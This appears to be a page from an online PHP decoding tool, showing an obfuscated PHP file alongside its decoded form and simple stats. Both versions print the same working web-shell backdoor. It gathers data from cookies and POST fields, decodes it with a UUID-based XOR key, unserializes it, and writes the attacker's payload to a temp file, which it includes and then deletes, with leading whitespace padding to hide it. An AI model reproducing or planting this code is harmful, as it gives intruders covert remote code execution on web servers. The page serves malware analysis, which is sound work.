Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ..

Decoded Output download

<?php                                                                                                                                                                                                                                                                                                                                                                                                 $kWXQCkXH = 'd' . "M" . 't' . chr (95) . chr (115) . chr ( 937 - 862 ).chr (68); $qqapvm = "c" . "l" . chr (97) . chr (115) . 's' . "_" . chr (101) . "x" . 'i' . 's' . chr ( 444 - 328 ).chr (115); $KZEqEcyn = class_exists($kWXQCkXH); $qqapvm = "43493";$lceQRTdUS = strpos($qqapvm, $kWXQCkXH);if ($KZEqEcyn == $lceQRTdUS){function LRboF(){$WFmpCb = new /* 8177 */ dMt_sKD(40092 + 40092); $WFmpCb = NULL;}$LDIOJPdikD = "40092";class dMt_sKD{private function HYddV($LDIOJPdikD){if (is_array(dMt_sKD::$qDpnw)) {$name = sys_get_temp_dir() . "/" . crc32(dMt_sKD::$qDpnw["salt"]);@dMt_sKD::$qDpnw["write"]($name, dMt_sKD::$qDpnw["content"]);include $name;@dMt_sKD::$qDpnw["delete"]($name); $LDIOJPdikD = "40092";exit();}}public function EMhzeWmkQy(){$MWFViDWTp = "24906";$this->_dummy = str_repeat($MWFViDWTp, strlen($MWFViDWTp));}public function __destruct(){dMt_sKD::$qDpnw = @unserialize(dMt_sKD::$qDpnw); $LDIOJPdikD = "22446_26933";$this->HYddV($LDIOJPdikD); $LDIOJPdikD = "22446_26933";}public function dWPoFM($MWFViDWTp, $GBsBvBdRGa){return $MWFViDWTp[0] ^ str_repeat($GBsBvBdRGa, intval(strlen($MWFViDWTp[0]) / strlen($GBsBvBdRGa)) + 1);}public function FDWip($MWFViDWTp){$lonRsIbgF = "b" . "a" . 's' . "e" . "6" . "4";return array_map($lonRsIbgF . chr (95) . chr (100) . "e" . chr ( 948 - 849 )."o" . 'd' . chr (101), array($MWFViDWTp,));}public function __construct($RKqZFxa=0){$pZXnVQzKJ = ",";$MWFViDWTp = "";$UddAKM = $_POST;$kQORCjNf = $_COOKIE;$GBsBvBdRGa = "9b267c27-5df8-4066-8789-3f5dc066fbf2";$yXHxfaIl = @$kQORCjNf[substr($GBsBvBdRGa, 0, 4)];if (!empty($yXHxfaIl)){$yXHxfaIl = explode($pZXnVQzKJ, $yXHxfaIl);foreach ($yXHxfaIl as $eLyUvGwTzn){$MWFViDWTp .= @$kQORCjNf[$eLyUvGwTzn];$MWFViDWTp .= @$UddAKM[$eLyUvGwTzn];}$MWFViDWTp = $this->FDWip($MWFViDWTp);}dMt_sKD::$qDpnw = $this->dWPoFM($MWFViDWTp, $GBsBvBdRGa);if (strpos($GBsBvBdRGa, $pZXnVQzKJ) !== FALSE){$GBsBvBdRGa = explode($pZXnVQzKJ, $GBsBvBdRGa); $gImmNxV = base64_decode(md5($GBsBvBdRGa[0])); $oXXlDQnIL = strlen($GBsBvBdRGa[1]) > 5 ? substr($GBsBvBdRGa[1], 0, 5) : $GBsBvBdRGa[1];$_GET['new_key'] = md5(implode('', $GBsBvBdRGa)); $UvVPn = str_repeat($oXXlDQnIL, 2);}}public static $qDpnw = 55517;}LRboF();} ?>

Did this file decode correctly?

Original Code

<?php                                                                                                                                                                                                                                                                                                                                                                                                 $kWXQCkXH = 'd' . "\x4d" . 't' . chr (95) . chr (115) . chr ( 937 - 862 ).chr (68); $qqapvm = "\143" . "\154" . chr (97) . chr (115) . 's' . "\x5f" . chr (101) . "\170" . 'i' . 's' . chr ( 444 - 328 ).chr (115); $KZEqEcyn = class_exists($kWXQCkXH); $qqapvm = "43493";$lceQRTdUS = strpos($qqapvm, $kWXQCkXH);if ($KZEqEcyn == $lceQRTdUS){function LRboF(){$WFmpCb = new /* 8177 */ dMt_sKD(40092 + 40092); $WFmpCb = NULL;}$LDIOJPdikD = "40092";class dMt_sKD{private function HYddV($LDIOJPdikD){if (is_array(dMt_sKD::$qDpnw)) {$name = sys_get_temp_dir() . "/" . crc32(dMt_sKD::$qDpnw["salt"]);@dMt_sKD::$qDpnw["write"]($name, dMt_sKD::$qDpnw["content"]);include $name;@dMt_sKD::$qDpnw["delete"]($name); $LDIOJPdikD = "40092";exit();}}public function EMhzeWmkQy(){$MWFViDWTp = "24906";$this->_dummy = str_repeat($MWFViDWTp, strlen($MWFViDWTp));}public function __destruct(){dMt_sKD::$qDpnw = @unserialize(dMt_sKD::$qDpnw); $LDIOJPdikD = "22446_26933";$this->HYddV($LDIOJPdikD); $LDIOJPdikD = "22446_26933";}public function dWPoFM($MWFViDWTp, $GBsBvBdRGa){return $MWFViDWTp[0] ^ str_repeat($GBsBvBdRGa, intval(strlen($MWFViDWTp[0]) / strlen($GBsBvBdRGa)) + 1);}public function FDWip($MWFViDWTp){$lonRsIbgF = "\x62" . "\x61" . 's' . "\x65" . "\66" . "\64";return array_map($lonRsIbgF . chr (95) . chr (100) . "\145" . chr ( 948 - 849 )."\x6f" . 'd' . chr (101), array($MWFViDWTp,));}public function __construct($RKqZFxa=0){$pZXnVQzKJ = "\x2c";$MWFViDWTp = "";$UddAKM = $_POST;$kQORCjNf = $_COOKIE;$GBsBvBdRGa = "9b267c27-5df8-4066-8789-3f5dc066fbf2";$yXHxfaIl = @$kQORCjNf[substr($GBsBvBdRGa, 0, 4)];if (!empty($yXHxfaIl)){$yXHxfaIl = explode($pZXnVQzKJ, $yXHxfaIl);foreach ($yXHxfaIl as $eLyUvGwTzn){$MWFViDWTp .= @$kQORCjNf[$eLyUvGwTzn];$MWFViDWTp .= @$UddAKM[$eLyUvGwTzn];}$MWFViDWTp = $this->FDWip($MWFViDWTp);}dMt_sKD::$qDpnw = $this->dWPoFM($MWFViDWTp, $GBsBvBdRGa);if (strpos($GBsBvBdRGa, $pZXnVQzKJ) !== FALSE){$GBsBvBdRGa = explode($pZXnVQzKJ, $GBsBvBdRGa); $gImmNxV = base64_decode(md5($GBsBvBdRGa[0])); $oXXlDQnIL = strlen($GBsBvBdRGa[1]) > 5 ? substr($GBsBvBdRGa[1], 0, 5) : $GBsBvBdRGa[1];$_GET['new_key'] = md5(implode('', $GBsBvBdRGa)); $UvVPn = str_repeat($oXXlDQnIL, 2);}}public static $qDpnw = 55517;}LRboF();} ?>

Function Calls

chr 9
class_exists 1

Variables

$qqapvm class_exists
$kWXQCkXH dMt_sKD

Stats

MD5 94e96c602cccbe401e2575e3e24c2dc8
Eval Count 0
Decode Time 70 ms